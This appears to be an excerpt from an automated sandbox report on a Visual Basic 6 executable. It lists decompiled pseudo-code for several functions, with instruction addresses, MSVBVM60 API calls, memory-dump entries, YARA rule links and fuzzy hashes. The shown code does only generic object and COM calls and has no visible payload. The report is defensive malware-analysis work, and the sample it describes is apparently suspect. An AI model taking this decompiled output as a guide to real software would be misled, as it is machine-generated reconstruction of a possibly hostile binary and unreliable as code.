				_t9 =  &_v72; // 0x41446c
				_v44 =  *((intOrPtr*)( *_t9));
				_t53 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
				asm("fclex");
				_v48 = _t53;
				if(_v48 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e64);
					_push(_v44);
					_push(_v48);
					L00401324();
					_v76 = _t53;
				}
				_v52 = _v40;
				_t58 =  *((intOrPtr*)( *_v52 + 0xf8))(_v52,  &_v36);
				asm("fclex");
				_v56 = _t58;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x404e84);
					_push(_v52);
					_push(_v56);
					L00401324();
					_v80 = _t58;
				}
				_t59 = _v36;
				_v68 = _t59;
				_v36 = _v36 & 0x00000000;
				L00401306();
				L004012E2();
				_push(0x412981);
				L004012FA();
				return _t59;
			}























                                                  0x00412860
                                                  0x0041286f
                                                  0x00412879
                                                  0x00412881
                                                  0x00412884
                                                  0x0041288b
                                                  0x0041289a
                                                  0x004128a4
                                                  0x004128be
                                                  0x004128a6
                                                  0x004128a6
                                                  0x004128ab
                                                  0x004128b0
                                                  0x004128b5
                                                  0x004128b5
                                                  0x004128c5
                                                  0x004128ca
                                                  0x004128d9
                                                  0x004128dc
                                                  0x004128de
                                                  0x004128e5
                                                  0x004128fe
                                                  0x004128e7
                                                  0x004128e7
                                                  0x004128e9
                                                  0x004128ee
                                                  0x004128f1
                                                  0x004128f4
                                                  0x004128f9
                                                  0x004128f9
                                                  0x00412905
                                                  0x00412914
                                                  0x0041291a
                                                  0x0041291c
                                                  0x00412923
                                                  0x0041293f
                                                  0x00412925
                                                  0x00412925
                                                  0x0041292a
                                                  0x0041292f
                                                  0x00412932
                                                  0x00412935
                                                  0x0041293a
                                                  0x0041293a
                                                  0x00412943
                                                  0x00412946
                                                  0x00412949
                                                  0x00412953
                                                  0x0041295b
                                                  0x00412960
                                                  0x0041297b
                                                  0x00412980

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412879
                                                  • __vbaNew2.MSVBVM60(00404E74,0041446C,?,?,?,?,00401216), ref: 004128B0
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E64,00000014), ref: 004128F4
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E84,000000F8), ref: 00412935
                                                  • __vbaStrMove.MSVBVM60 ref: 00412953
                                                  • __vbaFreeObj.MSVBVM60 ref: 0041295B
                                                  • __vbaFreeStr.MSVBVM60(00412981), ref: 0041297B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
                                                  • String ID: lDA
                                                  • API String ID: 1253681662-725749841
                                                  • Opcode ID: 7e0d0e49bcfcf93c1f34997e70cb0e06294d9df0bc4749aa899650ba2d56ca40
                                                  • Instruction ID: c93c5ccb47dc08e1895dc7e4bcdeaf05e0a9d6ccebc7e3f745a0e81d08fc1095
                                                  • Opcode Fuzzy Hash: 7e0d0e49bcfcf93c1f34997e70cb0e06294d9df0bc4749aa899650ba2d56ca40
                                                  • Instruction Fuzzy Hash: 3331D270D40208EFCB10EF95CA45BDDBBB5BF48714F10806AE401B72A1C7B85995DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004135A4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E004135A4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v44;
				void* _v52;
				void* _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _t51;
				signed int _t56;
				short _t57;
				void* _t65;
				void* _t67;
				intOrPtr _t68;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				L00401210();
				_v16 = _t68;
				_v12 = 0x401200;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401216, _t65);
				L004012DC();
				if( *0x41446c != 0) {
					_v84 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e74);
					L004012EE();
					_v84 = 0x41446c;
				}
				_t11 =  &_v84; // 0x41446c
				_v60 =  *((intOrPtr*)( *_t11));
				_t51 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v52);
				asm("fclex");
				_v64 = _t51;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e64);
					_push(_v60);
					_push(_v64);
					L00401324();
					_v88 = _t51;
				}
				_v68 = _v52;
				_t56 =  *((intOrPtr*)( *_v68 + 0xc0))(_v68,  &_v56);
				asm("fclex");
				_v72 = _t56;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0xc0);
					_push(0x404e84);
					_push(_v68);
					_push(_v72);
					L00401324();
					_v92 = _t56;
				}
				_t57 = _v56;
				_v28 = _t57;
				L004012E2();
				asm("wait");
				_push(0x4136bf);
				L00401312();
				return _t57;
			}























                                                  0x004135a7
                                                  0x004135b6
                                                  0x004135c0
                                                  0x004135c8
                                                  0x004135cb
                                                  0x004135d2
                                                  0x004135e1
                                                  0x004135ea
                                                  0x004135f6
                                                  0x00413610
                                                  0x004135f8
                                                  0x004135f8
                                                  0x004135fd
                                                  0x00413602
                                                  0x00413607
                                                  0x00413607
                                                  0x00413617
                                                  0x0041361c
                                                  0x0041362b
                                                  0x0041362e
                                                  0x00413630
                                                  0x00413637
                                                  0x00413650
                                                  0x00413639
                                                  0x00413639
                                                  0x0041363b
                                                  0x00413640
                                                  0x00413643
                                                  0x00413646
                                                  0x0041364b
                                                  0x0041364b
                                                  0x00413657
                                                  0x00413666
                                                  0x0041366c
                                                  0x0041366e
                                                  0x00413675
                                                  0x00413691
                                                  0x00413677
                                                  0x00413677
                                                  0x0041367c
                                                  0x00413681
                                                  0x00413684
                                                  0x00413687
                                                  0x0041368c
                                                  0x0041368c
                                                  0x00413695
                                                  0x00413699
                                                  0x004136a0
                                                  0x004136a5
                                                  0x004136a6
                                                  0x004136b9
                                                  0x004136be

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 004135C0
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004135EA
                                                  • __vbaNew2.MSVBVM60(00404E74,0041446C,?,?,?,?,00401216), ref: 00413602
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E64,00000014), ref: 00413646
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E84,000000C0), ref: 00413687
                                                  • __vbaFreeObj.MSVBVM60 ref: 004136A0
                                                  • __vbaFreeVar.MSVBVM60(004136BF), ref: 004136B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CheckFreeHresult$ChkstkNew2
                                                  • String ID: lDA
                                                  • API String ID: 304406766-725749841
                                                  • Opcode ID: 6862299eacd2d73e5f3b837839193aba951c6fca246b59ec7cfdb449669ca01a
                                                  • Instruction ID: 7a3435c0ee46f435ae7d7aba13d4303327bf8be1b1411d3de1d9af6546ede900
                                                  • Opcode Fuzzy Hash: 6862299eacd2d73e5f3b837839193aba951c6fca246b59ec7cfdb449669ca01a
                                                  • Instruction Fuzzy Hash: 7C31BC70900248EFDB10EFD5D989BDDBBB4BF48709F20406AF501BB2A1D7785A89DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412BD1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00412BD1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v80;
				signed int _v84;
				char* _t38;
				signed int _t41;
				void* _t52;
				void* _t54;
				intOrPtr _t55;

				_t55 = _t54 - 0xc;
				 *[fs:0x0] = _t55;
				L00401210();
				_v16 = _t55;
				_v12 = 0x401188;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401216, _t52);
				L004012DC();
				 *_a32 =  *_a32 & 0x00000000;
				if( *0x414010 != 0) {
					_v80 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v80 = 0x414010;
				}
				_t38 =  &_v60;
				L004012E8();
				_v64 = _t38;
				_t41 =  *((intOrPtr*)( *_v64 + 0x1ac))(_v64, _t38,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x334))( *_v80));
				asm("fclex");
				_v68 = _t41;
				if(_v68 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x404e0c);
					_push(_v64);
					_push(_v68);
					L00401324();
					_v84 = _t41;
				}
				L004012E2();
				_push(0x412cd4);
				L00401312();
				return _t41;
			}

















                                                  0x00412bd4
                                                  0x00412be3
                                                  0x00412bed
                                                  0x00412bf5
                                                  0x00412bf8
                                                  0x00412bff
                                                  0x00412c0e
                                                  0x00412c17
                                                  0x00412c1f
                                                  0x00412c29
                                                  0x00412c43
                                                  0x00412c2b
                                                  0x00412c2b
                                                  0x00412c30
                                                  0x00412c35
                                                  0x00412c3a
                                                  0x00412c3a
                                                  0x00412c5e
                                                  0x00412c62
                                                  0x00412c67
                                                  0x00412c72
                                                  0x00412c78
                                                  0x00412c7a
                                                  0x00412c81
                                                  0x00412c9d
                                                  0x00412c83
                                                  0x00412c83
                                                  0x00412c88
                                                  0x00412c8d
                                                  0x00412c90
                                                  0x00412c93
                                                  0x00412c98
                                                  0x00412c98
                                                  0x00412ca4
                                                  0x00412ca9
                                                  0x00412cce
                                                  0x00412cd3

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412BED
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412C17
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 00412C35
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412C62
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001AC), ref: 00412C93
                                                  • __vbaFreeObj.MSVBVM60 ref: 00412CA4
                                                  • __vbaFreeVar.MSVBVM60(00412CD4), ref: 00412CCE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Free$CheckChkstkHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 1725699769-3053050142
                                                  • Opcode ID: 7b0df041f81da9b63dbed54a34ce44c70249d50cdbc7270b4737f90c365ff0e7
                                                  • Instruction ID: 44f0c816146a19511fbd3ef7465996b718179417b64807d88e610ab766cec3e5
                                                  • Opcode Fuzzy Hash: 7b0df041f81da9b63dbed54a34ce44c70249d50cdbc7270b4737f90c365ff0e7
                                                  • Instruction Fuzzy Hash: 24212470A00208EFCB14EFA1D945BCDBBB4BF48704F10806AF501BB2A0D7B85951DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412769, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 49%
                                                  			E00412769(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				signed int _v32;
				intOrPtr _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				char* _t30;
				signed int _t34;
				intOrPtr _t47;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_push(0x28);
				L00401210();
				_v12 = _t47;
				_v8 = 0x401148;
				if( *0x414010 != 0) {
					_v56 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v56 = 0x414010;
				}
				_t30 =  &_v24;
				L004012E8();
				_v44 = _t30;
				_v32 = _v32 & 0x00000000;
				_v40 = 2;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t34 =  *((intOrPtr*)( *_v44 + 0x1d4))(_v44, 0x10, _t30,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x308))( *_v56));
				asm("fclex");
				_v48 = _t34;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1d4);
					_push(0x404e34);
					_push(_v44);
					_push(_v48);
					L00401324();
					_v60 = _t34;
				}
				L004012E2();
				_push(0x41284a);
				return _t34;
			}















                                                  0x0041276e
                                                  0x00412779
                                                  0x0041277a
                                                  0x00412781
                                                  0x00412784
                                                  0x0041278c
                                                  0x0041278f
                                                  0x0041279d
                                                  0x004127b7
                                                  0x0041279f
                                                  0x0041279f
                                                  0x004127a4
                                                  0x004127a9
                                                  0x004127ae
                                                  0x004127ae
                                                  0x004127d2
                                                  0x004127d6
                                                  0x004127db
                                                  0x004127de
                                                  0x004127e2
                                                  0x004127ec
                                                  0x004127f6
                                                  0x004127f7
                                                  0x004127f8
                                                  0x004127f9
                                                  0x00412802
                                                  0x00412808
                                                  0x0041280a
                                                  0x00412811
                                                  0x0041282d
                                                  0x00412813
                                                  0x00412813
                                                  0x00412818
                                                  0x0041281d
                                                  0x00412820
                                                  0x00412823
                                                  0x00412828
                                                  0x00412828
                                                  0x00412834
                                                  0x00412839
                                                  0x00000000

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412784
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 004127A9
                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401216), ref: 004127D6
                                                  • __vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401216), ref: 004127EC
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E34,000001D4,?,?,?,?,?,?,?,?,?,?,00401216), ref: 00412823
                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401216), ref: 00412834
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Chkstk$CheckFreeHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 3189907775-3053050142
                                                  • Opcode ID: 553ca0a950627aaec12132e07b3b891c585431e99014a1429fbdd9e001900653
                                                  • Instruction ID: 7347c759e1371e2be89e981500b80bf25355f465fb18fedafd3be5d372ca38f8
                                                  • Opcode Fuzzy Hash: 553ca0a950627aaec12132e07b3b891c585431e99014a1429fbdd9e001900653
                                                  • Instruction Fuzzy Hash: B0214171940608EFCB10DFD1D945BDEBBB9EF48714F20446AF501BB2A0C7B95980DB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412AA8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00412AA8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _t48;
				signed int _t53;
				short _t54;
				void* _t59;
				void* _t61;
				intOrPtr _t62;

				_t62 = _t61 - 0xc;
				 *[fs:0x0] = _t62;
				L00401210();
				_v16 = _t62;
				_v12 = 0x401178;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401216, _t59);
				if( *0x41446c != 0) {
					_v68 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e74);
					L004012EE();
					_v68 = 0x41446c;
				}
				_t9 =  &_v68; // 0x41446c
				_v44 =  *((intOrPtr*)( *_t9));
				_t48 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t48;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e64);
					_push(_v44);
					_push(_v48);
					L00401324();
					_v72 = _t48;
				}
				_v52 = _v36;
				_t53 =  *((intOrPtr*)( *_v52 + 0x68))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t53;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x404e84);
					_push(_v52);
					_push(_v56);
					L00401324();
					_v76 = _t53;
				}
				_t54 = _v40;
				_v28 = _t54;
				L004012E2();
				asm("wait");
				_push(0x412baa);
				return _t54;
			}






















                                                  0x00412aab
                                                  0x00412aba
                                                  0x00412ac4
                                                  0x00412acc
                                                  0x00412acf
                                                  0x00412ad6
                                                  0x00412ae5
                                                  0x00412aef
                                                  0x00412b09
                                                  0x00412af1
                                                  0x00412af1
                                                  0x00412af6
                                                  0x00412afb
                                                  0x00412b00
                                                  0x00412b00
                                                  0x00412b10
                                                  0x00412b15
                                                  0x00412b24
                                                  0x00412b27
                                                  0x00412b29
                                                  0x00412b30
                                                  0x00412b49
                                                  0x00412b32
                                                  0x00412b32
                                                  0x00412b34
                                                  0x00412b39
                                                  0x00412b3c
                                                  0x00412b3f
                                                  0x00412b44
                                                  0x00412b44
                                                  0x00412b50
                                                  0x00412b5f
                                                  0x00412b62
                                                  0x00412b64
                                                  0x00412b6b
                                                  0x00412b84
                                                  0x00412b6d
                                                  0x00412b6d
                                                  0x00412b6f
                                                  0x00412b74
                                                  0x00412b77
                                                  0x00412b7a
                                                  0x00412b7f
                                                  0x00412b7f
                                                  0x00412b88
                                                  0x00412b8c
                                                  0x00412b93
                                                  0x00412b98
                                                  0x00412b99
                                                  0x00000000

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412AC4
                                                  • __vbaNew2.MSVBVM60(00404E74,0041446C,?,?,?,?,00401216), ref: 00412AFB
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E64,00000014), ref: 00412B3F
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E84,00000068), ref: 00412B7A
                                                  • __vbaFreeObj.MSVBVM60 ref: 00412B93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CheckHresult$ChkstkFreeNew2
                                                  • String ID: lDA
                                                  • API String ID: 1616694062-725749841
                                                  • Opcode ID: eff5a229a22f98337aeed72f3d9b448246b84a92fe477aa3c00ef3b668cb6fb3
                                                  • Instruction ID: d30c6d5df6f549591cbbbddd43d2a72be8a8b8df56f0e8b28cc8679ea0bb43d5
                                                  • Opcode Fuzzy Hash: eff5a229a22f98337aeed72f3d9b448246b84a92fe477aa3c00ef3b668cb6fb3
                                                  • Instruction Fuzzy Hash: 4E31CF75940208EFCB10EF94D985BDDBBB5BF48714F20406AE501B72A0D3B86995DFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041253A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E0041253A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401210();
				_v16 = _t47;
				_v12 = 0x401128;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401216, _t44);
				if( *0x414010 != 0) {
					_v56 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v56 = 0x414010;
				}
				_t33 =  &_v36;
				L004012E8();
				_v40 = _t33;
				_t36 =  *((intOrPtr*)( *_v40 + 0x1bc))(_v40, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x344))( *_v56));
				asm("fclex");
				_v44 = _t36;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x404e0c);
					_push(_v40);
					_push(_v44);
					L00401324();
					_v60 = _t36;
				}
				L004012E2();
				asm("wait");
				_push(0x412613);
				return _t36;
			}
















                                                  0x0041253d
                                                  0x0041254c
                                                  0x00412556
                                                  0x0041255e
                                                  0x00412561
                                                  0x00412568
                                                  0x00412577
                                                  0x00412581
                                                  0x0041259b
                                                  0x00412583
                                                  0x00412583
                                                  0x00412588
                                                  0x0041258d
                                                  0x00412592
                                                  0x00412592
                                                  0x004125b6
                                                  0x004125ba
                                                  0x004125bf
                                                  0x004125ca
                                                  0x004125d0
                                                  0x004125d2
                                                  0x004125d9
                                                  0x004125f5
                                                  0x004125db
                                                  0x004125db
                                                  0x004125e0
                                                  0x004125e5
                                                  0x004125e8
                                                  0x004125eb
                                                  0x004125f0
                                                  0x004125f0
                                                  0x004125fc
                                                  0x00412601
                                                  0x00412602
                                                  0x00000000

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412556
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 0041258D
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004125BA
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001BC), ref: 004125EB
                                                  • __vbaFreeObj.MSVBVM60 ref: 004125FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CheckChkstkFreeHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 4127847336-3053050142
                                                  • Opcode ID: d8c5019f612b7b92250d119e53f20f339a76de626b719177e548aa833cfa5e74
                                                  • Instruction ID: 8c1608e49696ad6aa7ef46132c61954fc9563ebe409b27a04cfd63426828e730
                                                  • Opcode Fuzzy Hash: d8c5019f612b7b92250d119e53f20f339a76de626b719177e548aa833cfa5e74
                                                  • Instruction Fuzzy Hash: 01210770901208AFCB10DF95D989BDDBBF5BB48704F2044AAF101FB2A1C7B99990DB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004129A8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E004129A8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401210();
				_v16 = _t47;
				_v12 = 0x401168;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401216, _t44);
				if( *0x414010 != 0) {
					_v56 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v56 = 0x414010;
				}
				_t33 =  &_v36;
				L004012E8();
				_v40 = _t33;
				_t36 =  *((intOrPtr*)( *_v40 + 0x1ac))(_v40, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x374))( *_v56));
				asm("fclex");
				_v44 = _t36;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x404e0c);
					_push(_v40);
					_push(_v44);
					L00401324();
					_v60 = _t36;
				}
				L004012E2();
				asm("wait");
				_push(0x412a81);
				return _t36;
			}
















                                                  0x004129ab
                                                  0x004129ba
                                                  0x004129c4
                                                  0x004129cc
                                                  0x004129cf
                                                  0x004129d6
                                                  0x004129e5
                                                  0x004129ef
                                                  0x00412a09
                                                  0x004129f1
                                                  0x004129f1
                                                  0x004129f6
                                                  0x004129fb
                                                  0x00412a00
                                                  0x00412a00
                                                  0x00412a24
                                                  0x00412a28
                                                  0x00412a2d
                                                  0x00412a38
                                                  0x00412a3e
                                                  0x00412a40
                                                  0x00412a47
                                                  0x00412a63
                                                  0x00412a49
                                                  0x00412a49
                                                  0x00412a4e
                                                  0x00412a53
                                                  0x00412a56
                                                  0x00412a59
                                                  0x00412a5e
                                                  0x00412a5e
                                                  0x00412a6a
                                                  0x00412a6f
                                                  0x00412a70
                                                  0x00000000

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 004129C4
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 004129FB
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412A28
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001AC), ref: 00412A59
                                                  • __vbaFreeObj.MSVBVM60 ref: 00412A6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CheckChkstkFreeHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 4127847336-3053050142
                                                  • Opcode ID: 267c22efebde2c48285ac7506d8e42c21c18eea479fa893d9a4baa28a7ff554c
                                                  • Instruction ID: 086181a5b3836e0ef47ab20efe8b8832e8e9c70aeb2fb9733f16997062e74b5c
                                                  • Opcode Fuzzy Hash: 267c22efebde2c48285ac7506d8e42c21c18eea479fa893d9a4baa28a7ff554c
                                                  • Instruction Fuzzy Hash: EF212870A41208AFCB10DF95D989BCDBBB5AF08704F2044AAF101FB2A0C7B95A80CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411014, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 65%
                                                  			E00411014(intOrPtr* _a4) {
				void* _v3;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct HWND__* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v397355967;
				signed int _t30;
				intOrPtr* _t32;
				void* _t33;
				void* _t35;
				void* _t38;
				void* _t39;
				intOrPtr _t41;

				 *[fs:0x0] = _t41;
				L00401210();
				_v16 = _t41;
				_v12 = 0x4010d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t38, _t39, _t33, 0x3c,  *[fs:0x0], 0x401216);
				_t30 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
				asm("fclex");
				_v72 = _t30;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
